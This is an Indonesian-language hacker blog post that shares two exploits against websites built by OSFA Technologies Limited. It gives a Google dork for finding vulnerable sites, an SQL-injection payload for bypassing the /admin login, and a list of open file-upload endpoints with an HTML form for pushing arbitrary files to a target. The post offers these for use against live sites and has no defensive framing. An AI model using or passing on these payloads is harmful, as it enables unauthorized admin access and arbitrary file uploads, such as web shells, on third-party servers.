Breaking

Sunday, 22 September 2019

OSFA TECHNOLOGIES LIMITED Multiple Vulnerability

Hello genxxss👊😎, bek lagi sama admin tergans disini muehehe. Hari ini w mau share exploit yg ada pada OSFA TECHNOLOGIES LIMITED (Source from cxsecurity). Ada dua exploit disini yg pertama adalah Bypass SQL Login dan yg kedua adalah array files.

Exploit author: ManToed
Dork: intext:"OSFA TECHNOLOGIES LIMITED"

Bypass SQL Login
Exploit ini terletak pada halaman admin login yg ada pada /admin (localhost/admin)
Username: ' or 1=1 limit 1 -- -+
Password: ' or 1=1 limit 1 -- -+

Array files
Untuk exploit satu ini terletak pada
/admin/upload/server/php/
/admin/manageDownload/server/php/
/admin/sch_mgt/server/php/
CSRF:

<form method="POST" action="http://www.target.com/admin/upload/server/php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
Atau bisa juga menggunakan CSRF Online (Cari sendiri di google mld w)
PostFile: files[]


2 comments: